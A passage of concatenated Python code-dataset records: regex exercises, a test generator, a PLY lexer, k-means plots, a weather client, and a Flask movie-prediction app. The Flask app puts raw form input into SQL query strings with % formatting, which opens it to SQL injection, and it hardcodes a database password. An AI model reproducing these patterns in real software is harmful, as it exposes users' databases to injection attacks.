line)\n            if match:\n                x = match.groups()\n                test = x[0]\n                # print(test)\n                match2 = re.search(r\"(?P<last>[A-Za-z]+),\\s(?P<first>[A-Za-z]+)\", str(test))\n                value2 = x[3]\n\n                if match2:\n                    last = match2.group(\"last\")\n                    first = match2.group(\"first\")\n                    name = first + \" \" + last\n                else:\n                    name = str(test)\n\n                dic[name] = value2\n    return dic\n\nif __name__ == \"__main__\":\n    #url = \"http://www.purdue.edu/Home/Calendar?Year=2016&Month=September&Semester=Fall\"\n    #print(getUrlParts(url))\n    #url = \"http://www.google.com/Math/Const?Pi=3.14&Max_Int=65536&What_Else=Not-Here\"\n    #print(getQueryParameters(url))\n    #s = \"The TART program runs on Tuesdays and Thursdays, but it does not start until next week.\"\n    #print(getSpecial(s, 't'))\n    #s = 'An example of a MAC address is 58:1C:0A:6E:39:4D.'\n    #print(getRealMAC(s))\n    #print(finddata())\n    print(getRejectedEntries())\n    #print(getEmployeesWithIDs())\n    #print(getEmployeesWithStates())\n","sub_path":"ECE 364/Prelab06/regexApp.py","file_name":"regexApp.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"258496296","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport json\nimport re\n\n\ndef list_to_dict(headers):\n    d = {}\n    for h in headers:\n        if(h[:h.find(\": \")].strip() in [\"Content-Length\",\"Host\",\"Connection\",\"accept\",\"User-Agent\",\"Content-Type\",\"Origin\",\"Referer\",\"Accept-Encoding\",\"Cookie\",\"Accept-Language\"]):\n            continue\n        d[h[:h.find(\": \")].strip()] = h[h.find(\": \")+1:].strip()\n    return d\n\ndef str_to_dic(data):\n    d = {}\n    dl = data.split(\"&\")\n    for i in dl:\n        d[i.split(\"=\")[0]]=i.split(\"=\")[1]\n    return d\n\n\ndef make_code():\n\n    with open(\"demo.txt\",\"r\") as f:\n        content = f.read()\n\n\n    request_line = content.split(\"\\n\\n\")[0]\n    request_headers = request_line.split('\\n')[1:]\n    request_line = request_line.split('\\n')[0]\n    request_content = content.split(\"\\n\\n\")[1]\n    r = {}\n    method = request_line.split(\" \")[0].strip()\n    url = request_line.split(\" \")[1].strip().split(\"://\")[1].strip()\n    uri = url[url.find('/'):]\n    data=\"\"\n    if \"?\" in uri:\n        data = uri[uri.find('?') + 1:]\n        uri = uri[:uri.find('?')]\n    headers = list_to_dict(request_headers)\n    r[\"func_name\"] = uri[uri.rfind(\"/\")+1:]\n    r[\"method\"]=method\n    r[\"uri\"] = uri\n    r[\"headers\"] = headers\n\n    req = '''def test_{func_name}(pub_data):\n    method = \"{method}\" # request method, all uppercase\n    feature = \"User module\" # first-level grouping in the allure report\n    story = 'User login' # second-level grouping in the allure report\n    title = \"All-fields normal flow_1\" # test case name in the allure report\n    uri = \"{uri}\" # endpoint address\n    headers = {headers}\n    status_code = 200 # response status code\n    expect = \"\" # expected result\n'''.format(**r)\n    dic={}\n    if \"=\" in data and method==\"GET\" and len(dic) == 0:\n        req += \"    params={}\\n\".format(str_to_dic(data))\n        dic[\"params\"]=None\n    elif(\"=\" in data and method==\"POST\" and len(dic) == 0):\n        req += \"    data={}\\n\".format(str_to_dic(data))\n        kk = re.compile(\"'Content-Type': '(.*?)'\")\n        tt = kk.findall(req)\n        print(tt)\n        if(len(tt) == 1):\n            b = \"'Content-Type': '{}'\".format(tt[0])\n            req = req.replace(b,\"'Content-Type': 'application/x-www-form-urlencoded'\")\n        dic[\"data\"] = None\n\n    try:\n        s = json.loads(request_content)\n        req += \"    json_data='''{}'''\\n\".format(request_content)\n        dic[\"json_data\"] = None\n    except:\n        if \"=\" in request_content and len(dic) == 0:\n            req += \"    data={}\\n\".format(str_to_dic(request_content))\n            dic[\"data\"] = None\n        elif len(dic) == 0:\n            req += \"    data='''{}'''\\n\".format(request_content)\n            
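# record that a 'data' kwarg was generated so it is appended to the request call below\n            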
dic[\"data\"] = None\n\n\n\n    a = '''\n    # -------------------- Divider: do not modify anything below -----------------------------------------\n    # method, pub_data and url are required fields\n    r = request_tool.request(method=method,url=uri,pub_data=pub_data,status_code=status_code,headers=headers,expect=expect,feature=feature,story=story,title=title'''\n    req += a\n    for d in dic:\n        req += \",{}={}\".format(d,d)\n    req += \")\"\n    print(r)\n    with open(\"demo.txt\",\"w\") as f:\n        f.write(req)\n\n    print(req)\n\nif __name__ == '__main__':\n    make_code()\n\n","sub_path":"make_demo.py","file_name":"make_demo.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"562719465","text":"# -*- coding: latin-1 -*-\n# function to build a two-dimensional grid\n# G=mkgrid2d(xgrid,ygrid)\n# Inputs: xgrid and ygrid\n#         arrays with the desired spacings in x and y\n# Outputs: G -> 2xN array\n#          N is the total number of points in the grid\n# Example:\n# g1=np.arange(-1.,1.25,.25)\n# g2=np.arange(-2.,2.5,.5)\n# G=mkgrid2d(g1,g2)\nimport numpy as np\ndef mkgrid2d(xGrid,yGrid):\n    X,Y=np.meshgrid(xGrid,yGrid)\n    c=len(xGrid)\n    r=len(yGrid)\n    Xt=X.copy()\n    for i in np.arange(0,r,2):\n        Xt[i,:]=Xt[i,np.arange(c-1,-1,-1)]\n\n    x1=Xt.flatten()\n    x2=X.T.flatten()\n    x=np.hstack((x2,x1))\n\n    Yt=Y.copy()\n    for i in np.arange(1,c,2):\n        Y[:,i]=Y[np.arange(r-1,-1,-1),i]\n\n    y1=Y.T.flatten()\n    y2=Yt.flatten()\n    y=np.hstack((y1,y2))\n\n    G=np.vstack((x,y))\n    #print G.shape\n    return G\n\n","sub_path":"AA/materia/ficha 1/mkgrid2d.py","file_name":"mkgrid2d.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"165590912","text":"# import os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\nimport cv2\nimport numpy as np \nfrom Detectors.YoloOpencvDetector import YoloOpencvDetector\nfrom Detectors import Utils \nimport time\n# detector = YoloOpencvDetector(\"./Detectors/YOLO/yolov3.cfg\", \"./Detectors/YOLO/yolov3_320.weights\")\n# detector = YoloOpencvDetector(\"./Detectors/YOLO/yolov3.cfg\", \"./Detectors/YOLO/yolov3.weights\")\n# detector = YoloOpencvDetector(\"./Detectors/YOLO/yolov3.cfg\", \"./Detectors/YOLO/yolov3.weights\")\n# detector = YoloOpencvDetector(\"./Detectors/YOLO/yolov2-voc.cfg\", \"./Detectors/YOLO/yolov2-voc.weights\")\ndetector = YoloOpencvDetector(\"./Detectors/YOLO/signs/yolov3_cfg.cfg\", \"./Detectors/YOLO/signs/yolov3_cfg_8800.weights\", CLASSESPath=\"./signs.names\")\n# cap = cv2.VideoCapture(\"/home/vasily/Downloads/DJI_0002.MP4\")\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, int(640))\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, int(480))\n# out = cv2.VideoWriter()\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout = cv2.VideoWriter('output_3.avi',fourcc, 28.0, (640,480))\nframe_i = 0\ntime.sleep(1)\nwhile True:\n    ret, frame = cap.read()\n    if ret == False:\n        break\n    if 0 == 0:\n\n        # frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)\n        # boxes, classIDs, confidences = detector.detect(frame, s=(320, 320))\n        boxes, classIDs, confidences = detector.detect(frame, s=(320, 320))\n        # boxes, classIDs, confidences = detector.detect(frame, s=(416, 416))\n        # boxes, classIDs, confidences = detector.detect(frame, s=(608, 608))\n        # boxes, classIDs, confidences = detector.detect(frame, s=(700, 700))\n        frame = Utils.draw_boxes(frame, boxes, classIDs, confidences, detector.CLASSES, COLORS=detector.COLORS)\n        out.write(frame)\n        cv2.imshow(\"frame\", frame)\n\n        if cv2.waitKey(1) == 
ord('q'):\n break\n frame_i +=1 \ncap.release()\nout.release()","sub_path":"src/ObjectDetection/obj_detectors/test_detectors.py","file_name":"test_detectors.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481696159","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_utils\n----------------------------------\n\nTests for `sqlalchemy_test_cache.utils` module.\n\"\"\"\nfrom __future__ import unicode_literals\n\nimport collections\nimport contextlib\nimport os\nimport tempfile\nimport unittest\ntry:\n from unittest import mock\nexcept ImportError: # python2\n import mock # noqa\n\nfrom sqlalchemy_test_cache import utils\n\n\nFakeDialect = collections.namedtuple('FakeDialect', 'statement_compiler')\nFakeStatementCompiler = collections.namedtuple('FakeStatementCompiler', '')\n\n\n@contextlib.contextmanager\ndef create_tmp_file(content, name):\n\n _tempfile = '{}/{}'.format(tempfile.gettempdir(), name)\n\n try:\n with open(_tempfile, 'w') as f:\n f.write(content)\n\n yield\n finally:\n os.unlink(_tempfile)\n\n\nclass GenerateValueLiteralCompilerTestCase(unittest.TestCase):\n\n def test_ensure_compiler_uses_dialect_statement_compiler(self):\n\n dialect = FakeDialect(statement_compiler=FakeStatementCompiler)\n\n qlc = utils.generate_value_literal_compiler(dialect)\n\n self.assertTrue(issubclass(qlc, FakeStatementCompiler))\n\n\nclass GenerateDumpPathTestCase(unittest.TestCase):\n\n def test_generate_path_with_default_base_dir(self):\n\n dump_path = utils.generate_dump_path('ClassName', 123456789)\n\n basedir = tempfile.gettempdir()\n\n self.assertEqual('{}/ClassName-123456789.dump'.format(basedir), dump_path)\n\n def test_exception_when_basedir_is_not_none_but_use_tmp_is_true(self):\n\n with self.assertRaises(ValueError) as cm:\n utils.generate_dump_path('ClassName', 123456789, use_tmp=True, basedir='/base/dir')\n\n exception = cm.exception\n\n expected_message = 'To use the basedir {!r}, you must set the parameter {!r} as {!r}.'.format(\n '/base/dir', 'use_tmp', False\n )\n\n self.assertEqual(str(exception), expected_message)\n\n def test_exception_when_use_tmp_is_false_but_basedir_is_none(self):\n\n with self.assertRaises(ValueError) as cm:\n utils.generate_dump_path('ClassName', 123456789, use_tmp=False)\n\n exception = cm.exception\n\n expected_message = 'As the parameter {!r} is {!r}, you need to inform a basedir'.format(\n 'use_tmp', False\n )\n\n self.assertEqual(str(exception), expected_message)\n\n def test_generate_path_when_basedir_is_not_none(self):\n\n dump_path = utils.generate_dump_path('ClassName', 123456789, use_tmp=False, basedir='/foobar')\n\n self.assertEqual(dump_path, '/foobar/ClassName-123456789.dump')\n\n\nclass LoadDumpDataFromFileTestCase(unittest.TestCase):\n\n def test_exception_when_dump_file_path_does_not_exists(self):\n\n with self.assertRaises(IOError) as cm:\n list(utils.load_dump_data_from_file('foobarbleh'))\n\n exception = cm.exception\n\n expected_message = '[Errno 2] No such file or directory: {!r}'.format('foobarbleh')\n\n self.assertEqual(expected_message, str(exception))\n\n def test_load_data(self):\n\n with create_tmp_file(content='INSERT INTO...\\n', name='ClassName-123456789.dump'):\n\n dump_data = list(utils.load_dump_data_from_file('/tmp/ClassName-123456789.dump'))\n\n self.assertListEqual(['INSERT INTO...\\n'], dump_data)\n\n\nclass WriteDumpToFileTestCase(unittest.TestCase):\n\n def wite_dump_data(self):\n\n dump_data = 
'\\n'.join(['INSERT INTO \"\" ...', 'INSERT INTO \"\" ...', 'INSERT INTO \"\" ...'])\n\n dump_file_path = tempfile.NamedTemporaryFile().name\n\n utils.write_dump_data_to_file(dump_file_path, dump_data)\n\n self.assertListEqual(\n list(line.strip() for line in utils.load_dump_data_from_file(dump_file_path)),\n dump_data.split('\\n')\n )\n","sub_path":"tests/unit/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"326408979","text":"__author__ = 'xiangyu'\n\n\ndef addXOROR(camOut, oraOut, startIndex1, startindex2):\n xorInt = startindex2\n cnFile = []\n i = 0\n for po in camOut:\n xorInt += 1\n sig1 = po\n sig2 = oraOut[i]\n i+=1\n poConsLine1 = '-'+str(sig1)+' -'+str(sig2)+' -'+str(xorInt)+' 0\\n'\n cnFile.append(poConsLine1)\n poConsLine2 = str(sig1)+' '+str(sig2)+' -'+str(xorInt)+' 0\\n'\n cnFile.append(poConsLine2)\n poConsLine3 = str(sig1)+' -'+str(sig2)+' '+str(xorInt)+' 0\\n'\n cnFile.append(poConsLine3)\n poConsLine4 = '-'+str(sig1)+' '+str(sig2)+' '+str(xorInt)+' 0\\n'\n cnFile.append(poConsLine4)\n\n orIndex = xorInt+1\n orLine = ''\n for xorInt in range(startindex2+1, orIndex):\n orLine += str(xorInt)+' '\n orLine += '-' + str(orIndex)+' 0\\n'\n cnFile.append(orLine)\n orLine1 = ''\n for xorInt in range(startindex2+1, orIndex):\n orLine1= '-'+str(xorInt)+' ' + str(orIndex)+' 0\\n'\n cnFile.append(orLine1)\n cnFile.append(str(orIndex) + ' 0\\n')\n # line = 'This is generated for XORAND\\n'\n # cnFile.append((line))\n\n return cnFile, orIndex\n","sub_path":"Mix/c880/method_XOROR.py","file_name":"method_XOROR.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"438979422","text":"# third\r\nimport pprint\r\nimport sqlite3\r\nfrom flask import g\r\nimport config\r\n\r\nDATABASE = config.DB_PATH\r\n\r\n\r\nclass Database:\r\n\r\n #----------\r\n # __init__\r\n #----------\r\n def __init__(self):\r\n\r\n # self.response = {}\r\n self.response = {}\r\n\r\n\r\n #----------\r\n # get_db()\r\n #----------\r\n def get_db(self):\r\n\r\n db = getattr(g, '_database', None)\r\n if db is None:\r\n db = g._database = sqlite3.connect(DATABASE)\r\n return db \r\n\r\n\r\n #----------\r\n # query_db()\r\n #----------\r\n def query_db(self, query, args=(), one=False):\r\n\r\n cur = self.get_db().execute(query, args)\r\n self.get_db().commit()\r\n rv = cur.fetchall()\r\n cur.close()\r\n return (rv[0] if rv else None) if one else rv\r\n # return rv\r\n\r\n #----------\r\n # query_db()\r\n #----------\r\n def query_db2(self, query, args=(), one=False):\r\n\r\n cur = self.get_db().execute(query, args)\r\n self.get_db().commit()\r\n rv = cur.fetchall()\r\n result = rv[0][0]\r\n cur.close()\r\n return result\r\n\r\n def init(self):\r\n query = \"\"\" CREATE TABLE IF NOT EXISTS category (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n category text NOT NULL,\r\n status int NOT NULL\r\n );\r\n\r\n CREATE TABLE IF NOT EXISTS client (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n name text NOT NULL,\r\n mail text NOT NULL,\r\n cellphone text NOT NULL,\r\n birthday date NOT NULL,\r\n dni text NOT NULL,\r\n status int NOT NULL\r\n );\r\n\r\n CREATE TABLE IF NOT EXISTS product (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n category int NOT NULL,\r\n name text NOT NULL,\r\n stock int NOT NULL,\r\n stock_limit int NOT NULL,\r\n input_date date NOT NULL,\r\n buy_price float NOT NULL,\r\n 
sale_price float NOT NULL,\r\n                        photo text NOT NULL,\r\n                        status int NOT NULL\r\n                    );\r\n\r\n                    CREATE TABLE IF NOT EXISTS user (\r\n                        id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n                        name text NOT NULL,\r\n                        lastname text NOT NULL,\r\n                        mail text NOT NULL,\r\n                        pass text NOT NULL,\r\n                        profile int NOT NULL,\r\n                        status int NOT NULL\r\n                    );\r\n\r\n                    CREATE TABLE IF NOT EXISTS sale (\r\n                        id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n                        productId int NOT NULL,\r\n                        quantity int NOT NULL,\r\n                        sale_date date not null,\r\n                        total float not null,\r\n                        status int NOT NULL\r\n                    );\r\n                \"\"\"\r\n        cur = self.get_db().executescript(query)\r\n        self.get_db().commit()","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"526921719","text":"import ply.lex as lex\nimport re\nimport codecs\nimport os\nimport sys\n\nkeywords = [\n    'INTEGER', 'REAL',\n\n    'READ', 'WRITE', 'FORMAT',\n    'END', 'STOP',\n    'CALL', 'CONTINUE',\n    'DO',\n    'PAUSE',\n\n    'IF',\n\n    ]\n\ntokens = keywords + [\n    'POWER', 'RPAREN','LPAREN', 'TIMES', 'MINUS',\n    'PLUS','COMMA','DIVIDE',\n    # Logical operators\n    'LT', 'LE', 'GT', 'GE', 'EQ','GTE','LTE','NE',\n\n    # Literals\n\n    'ID', 'GOTO','AND','OR','NOT'\n    ]\n\nliterals = '+-*/(),**'\n\nt_ignore = '\\t | \\r'\nt_PLUS = r'\\+'\nt_MINUS = r'\\-'\nt_TIMES = r'\\*'\nt_DIVIDE = r'/'\nt_POWER = r'\\*\\*'\n#t_ODD = r'ODD'###\n\nt_NE = r'<>'\nt_LT = r'<'\nt_LTE = r'<='\nt_GT = r'>'\nt_GTE = r'>='\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_COMMA = r','\n\nt_INTEGER = r'\\d+'\nt_REAL = r'\\d+\\.\\d*(E[-+]?[1-9][0-9]?)?'\nt_GOTO = r'GO\\s?TO'\n\n# Ignore comments\ndef t_comment( t):\n    r'C.*'\n    pass\n\n# Real constants\ndef t_RCONST( t):\n    r'\\d+\\.\\d*(E[-+]?[1-9][0-9]?)?'\n    t.value = float(t.value)\n    return t\n\n# Integer constants\ndef t_ICONST( t):\n    r'\\d+'\n    t.value = int(t.value)\n    return t\n\n# Rule for identifiers\ndef t_ID( t):\n    r'[A-Z][A-Z0-9]*'\n    if t.value in keywords:\n        t.type = t.value\n    return t\n\n# Rule for tracking line numbers\ndef t_newline( t):\n    r'\\n+'\n    t.lexer.lineno += len(t.value)\n\n# Error handling\ndef t_error( t):\n    print(\"Illegal character '%s'\" % t.value[0])\n    t.lexer.skip(1)\n\n\n\n\n\nanalizador = lex.lex()\n","sub_path":"lexer5.py","file_name":"lexer5.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"325187856","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\nimport scipy.cluster.hierarchy as sch\r\nfrom scipy.spatial.distance import cdist\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.metrics import silhouette_samples, silhouette_score\r\n\r\n# Displays an elbow graph of the data. From it you should be able to see where the optimal number\r\n# of clusters is.\r\ndef elbow(X):\r\n    distortions = []\r\n    K = range (1, 36)\r\n    for k in K:\r\n        kmeanModel = KMeans(n_clusters=k).fit(X)\r\n        kmeanModel.fit(X)\r\n        distortions.append(sum(np.min(cdist(X, kmeanModel.cluster_centers_, 'euclidean'), axis=1)) / X.shape[0])\r\n\r\n    plt.plot(K, distortions, 'bx-')\r\n    plt.xlabel('k')\r\n    plt.ylabel('Distortion')\r\n    plt.title(\"The Elbow Method showing the optimal k\")\r\n    plt.show()\r\n    print(\"leaving elbow\")\r\n\r\n\r\n# Display a silhouette graph of the data. 
It is supposed to help you learn where the optimal number of\r\n# clusters is.\r\ndef silhouette(X): \r\n range_n_clusters = [11,12,13,14,15,16,17,18,19,20,21,22,23,24]\r\n for n_clusters in range_n_clusters:\r\n # Create a subplot with 1 row and 2 columns\r\n fig, (ax1, ax2) = plt.subplots(1,2)\r\n fig.set_size_inches(18,7)\r\n \r\n # The 1st subplot is the silhouette plot\r\n # The silhouette coefficient can range from -1, 1 but in this xaple all\r\n # lie within \r\n ax1.set_xlim([-1, 1])\r\n \r\n# ax1.set_ylim([(0, X[:,0] + n_clusters + 1) * 10])\r\n \r\n clusterer = KMeans(n_clusters=n_clusters, random_state=0)\r\n cluster_labels = clusterer.fit_predict(X)\r\n \r\n silhouette_avg = silhouette_score(X, cluster_labels)\r\n print(\"For n-clusers =\", n_clusters,\"The average silhouette_score is :\", silhouette_avg)\r\n \r\n sample_silhouette_values = silhouette_samples(X, cluster_labels, metric='euclidean')\r\n y_lower = 10\r\n yticks = []\r\n for i in range(n_clusters):\r\n ith_cluster_silhouette_values = sample_silhouette_values[cluster_labels ==i]\r\n ith_cluster_silhouette_values.sort()\r\n size_cluster_i = ith_cluster_silhouette_values.shape[0]\r\n y_upper = y_lower + size_cluster_i\r\n color = cm.nipy_spectral(float(i) / n_clusters)\r\n ax1.fill_betweenx(np.arange(y_lower, y_upper),\r\n 0, ith_cluster_silhouette_values,\r\n facecolor=color, edgecolor=color, alpha=0.7)\r\n ax1.text(-0.05,y_lower + 0.5 * size_cluster_i, str(i))\r\n \r\n y_lower = y_upper + 10\r\n \r\n ax1.set_title(\"The silhouette plot for the various lusters.\")\r\n ax1.set_xlabel(\"The silhouete coefficien values\")\r\n ax1.set_ylabel(\"Cluster label\")\r\n \r\n ax1.set_yticks([])\r\n ax1.set_xticks([-1.0, -.8, -.6, -.4, -.2, 0, 0.2, 0.4, 0.6, 0.8, 1])\r\n colors = cm.nipy_spectral(cluster_labels.astype(float) / n_clusters)\r\n ax2.scatter(X[:, 0], X[:, 1], marker = '.', s=30, lw=0, alpha=0.7,\r\n c=colors, edgecolor='k')\r\n \r\n centers = clusterer.cluster_centers_\r\n \r\n ax2.scatter(centers[:, 0], centers[:,1], marker='o',c=\"white\", alpha=1, s=200, edgecolor = 'k')\r\n for i, c in enumerate(centers):\r\n ax2.scatter(c[0], c[1], marker='$%d$' %i, alpha=1,s=50, edgecolor='k')\r\n \r\n ax2.set_title(\"The visualization of the clustered data.\")\r\n ax2.set_xlabel(\"Feature space for the 1st feature\")\r\n ax2.set_ylabel(\"Feature space for the 2nd feature\")\r\n \r\n plt.suptitle((\"Silhouette analysis for KMeans lusteringon sample data \"\r\n \"with N_clusters = %d\" % n_clusters),fontsize=14, fontweight = 'bold')\r\n\r\n plt.show()\r\n\r\n\r\ndef dendrogram(X):\r\n dendrogram = sch.dendrogram(sch.linkage(X, method='ward'))","sub_path":"ml_baseline/shared_modules/kmeans_graph_utils.py","file_name":"kmeans_graph_utils.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"516492203","text":"import urllib.request\nimport json\n\nclass WeatherData:\n \n api_key = '7e95614bcf837210'\n temperature = ''\n weather_conditions = ''\n wind_speed = ''\n city = ''\n \n url_data={\n 'Toronto':['zmw:00000.176.71508.json'],\n 'Montreal':['canada/Montreal.json'],\n 'Vancouver':['canada/Vancouver.json'],\n 'New York':['NY/New_York.json'],\n 'Los Angeles':['CA/Los_Angeles.json'],\n 'London':['UK/London.json'],\n 'Mumbai':['india/Mumbai.json'],\n 'Paris':['fr/paris.json'],\n 'test':['cd/kinshasa.json']\n }\n \n def __init__(self, city):\n self.city = city\n request = urllib.request.urlopen(\"http://api.wunderground.com/api/\" +\n 
self.api_key +\n \"/conditions/q/\" +\n self.url_data[self.city][0])\n \n json_string = request.read()\n \n parse_json = json.loads(json_string.decode('utf-8'))\n self.temperature = parse_json['current_observation']['temp_c']\n self.weather_conditions = parse_json['current_observation']['weather']\n self.wind_speed = parse_json['current_observation']['wind_kph']\n \n \n def getServoValue(self):\n temp_factor = (self.temperature*100)/30\n wind_factor = (self.temperature*100)/20\n servo_value = temp_factor-(wind_factor/20)\n \n if(servo_value >= 100):\n return 100\n elif (servo_value <= 0):\n return 0\n else:\n return servo_value\n \n def getLEDValue(self):\n if (self.weather_conditions=='Thunderstorm'):\n return 2;\n elif(self.weather_conditions=='Raining'):\n return 1\n else:\n return 0\n \nif __name__==\"__main__\":\n \n weather = WeatherData('Paris')\n print(weather.getServoValue())\n print(weather.getLEDValue())\n\n \n \n \n \n \n\n\n \n\n ","sub_path":"Chapter 6/Code/WeatherData.py","file_name":"WeatherData.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"377849886","text":"from unittest.mock import patch\nfrom maintain_frontend.dependencies.session_api.session import Session\n\n\nclass Utilities(object):\n \"\"\"Helper class that mocks out the session for test making app requests.\n\n\n Supports both unittest framework and flasktest framework.\n\n Place in test set up Utilities.mock_session_cookie_unittest(self)\n\n or\n\n Utilities.mock_session_cookie_flask_test(self)\n \"\"\"\n\n @staticmethod\n def mock_session_cookie_unittest(unittest):\n patcher = patch('maintain_frontend.app.Session')\n unittest.addCleanup(patcher.stop)\n unittest.mock_session = patcher.start()\n unittest.app.set_cookie('localhost', Session.session_cookie_name, 'cookie_value')\n unittest.mock_session.return_value.valid.return_value = True\n unittest.mock_session.session_cookie_name = Session.session_cookie_name\n\n @staticmethod\n def mock_session_cookie_flask_test(flasktest):\n patcher = patch('maintain_frontend.app.Session')\n flasktest.mock_session = patcher.start()\n flasktest.mock_session.return_value.valid.return_value = True\n flasktest.mock_session.session_cookie_name = Session.session_cookie_name\n","sub_path":"unit_tests/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"356829848","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport psycopg2\nimport pandas as pd\nfrom sklearn.externals import joblib\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom flask import Flask, Response, render_template, request, jsonify\n\napp = Flask(__name__)\napp.debug = True\ndbname = 'movie'\nusername = 'trevor'\n\n# Filenames for loaded lists of data for prediction objects from machine learning algorithm\ncritic_filename = os.path.join('CriticForestNew3.sav')\naudience_filename = os.path.join('AudienceForestNew3.sav')\nbreakeven_filename = os.path.join('BreakevenForestNew3.sav')\n# Loading data using filenames defined above placed in joblib.load()\ncritic_predictor = joblib.load(critic_filename)\naudience_predictor = joblib.load(audience_filename)\nbreakeven_predictor = joblib.load(breakeven_filename)\n\n# Takes output of critic and audience tomatometer predictions and creates string equivalents for insertion into HTML text\ndef 
FreshPredict(prediction_data, predict_object):\n prediction = int(predict_object.predict(prediction_data))\n if prediction == 1:\n return 'fresh'\n else:\n return 'rotten'\n\n# Binarizes output of Critic (and audience) tomatometer prediction algorithm for input into gross profit breakeven prediction algorithm\ndef CriticVariable(FreshPredictOutput):\n if FreshPredictOutput == 'fresh':\n return 1\n else:\n return 0\n\n# Takes output of breakeven prediction and creates string equivalents for insertion into HTML text\ndef BreakevenPredict(prediction_data, predict_object):\n prediction = int(predict_object.predict(prediction_data))\n if prediction == 1:\n return 'will'\n else:\n return 'will not'\n\n# Takes output of breakeven prediction and creates input for insertion into ProbabilityMaker function\ndef BreakevenVariable(FreshPredictOutput):\n if FreshPredictOutput == 'will':\n return 1\n else:\n return 0\n\n# Output random forest probabilities given the prediction data and object\ndef ProbabilityMaker(prediction_data, prediction_object, prediction_made):\n b = prediction_object.predict_proba(prediction_data)\n if prediction_made == 1:\n return (\"%0.2f\" % (float(b[:,1]) * 100))\n else:\n return (\"%0.2f\" % (float(b[:,0]) * 100))\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/index',methods=['GET','POST'])\ndef indexsearch():\n try:\n if request.method =='POST':\n connector = psycopg2.connect(dbname='movie', user='trevor', host='localhost', password='password')\n cursor = connector.cursor()\n # Putting user-input web form data into variables\n dName_input = request.form['director']\n #dForm = SearchForm(dName_input)\n #dName_input = SearchForm(request.form['director'])\n aName_input = request.form['actor']\n genre_input = request.form['genre']\n location1_input = request.form['country']\n location2_input = request.form['state']\n production_input = request.form['production']\n runtime_input = int(request.form['runtime'])\n budget_input = int(request.form['budget'])\n # SQL queries to match user input with label encoding for prediction\n dn_qry = (\"\"\"select \"dN\" FROM movie WHERE \"dName\" = '%s';\"\"\" % dName_input)\n cursor.execute(dn_qry, dName_input)\n director = cursor.fetchall()\n an_qry = (\"\"\"select \"aN\" FROM movie WHERE \"aName\" = '%s';\"\"\" % aName_input)\n cursor.execute(an_qry, aName_input)\n actor = cursor.fetchall()\n l1_qry = (\"\"\"select \"l1\" FROM movie WHERE \"location1\" = '%s';\"\"\" % location1_input)\n cursor.execute(l1_qry, location1_input)\n country = cursor.fetchall()\n l2_qry = (\"\"\"select \"l2\" FROM movie WHERE \"location2\" = '%s';\"\"\" % location2_input)\n cursor.execute(l2_qry, location2_input)\n state = cursor.fetchall()\n ge_qry = (\"\"\"select \"ge\" FROM movie WHERE \"genre\" = '%s';\"\"\" % genre_input)\n cursor.execute(ge_qry, genre_input)\n genre = cursor.fetchall()\n f1_qry = (\"\"\"select \"f1\" FROM movie WHERE \"first_production_company\" = '%s';\"\"\" % production_input)\n cursor.execute(f1_qry, production_input)\n production = cursor.fetchall()\n critic_prediction_data = pd.DataFrame({'dN' : [(\"%s\"%director[0])], 'aN' : [(\"%s\"%actor[0])], 'l1' : [(\"%s\"%country[0])], 'l2' : [(\"%s\"%state[0])],\n 'ge' : [(\"%s\"%genre[0])], 'f1' : [(\"%s\"%production[0])], 'runtime' : [int(runtime_input)], 'budget' : [int(budget_input)]})\n Critic_result = str(FreshPredict(critic_prediction_data, critic_predictor))\n BreakevenCriticVar = CriticVariable(Critic_result)\n Critic_percent = 
